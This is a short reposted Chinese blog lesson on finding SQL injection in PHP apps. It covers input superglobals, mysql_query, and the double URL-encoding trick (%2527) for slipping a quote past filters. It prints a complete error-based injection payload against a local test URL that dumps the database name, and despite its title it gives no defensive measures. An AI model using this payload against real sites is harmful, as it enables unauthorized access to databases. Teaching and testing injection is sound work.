第四课 sql注入及防护实践

转载 于 2019-06-17 21:57:00 发布 · 131 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/idebug/p/11042439.html
文章标签:

#php #数据库

博客主要围绕挖掘SQL注入漏洞展开,介绍了常见获取变量如$_GET、$_POST等,提及数据库操作函数,还给出了注入测试的URL示例,最后提供了课后了解PHP知识的网址。

挖掘sql注入漏洞

常见获取变量

$_GET  $_POST $_COOKIE $_SERVER $_REQUEST

数据库操作函数

搜索

mysql_query()

‘url编码是%27

%url编码是%25

%2527

注入测试

http://127.0.0.1/blog/search.php?s=%2527%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(Hex(cast(database()%20as%20char))),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20%23

 

课后了解

http://www.w3school.com.cn/php/index.asp

转载于:https://www.cnblogs.com/idebug/p/11042439.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值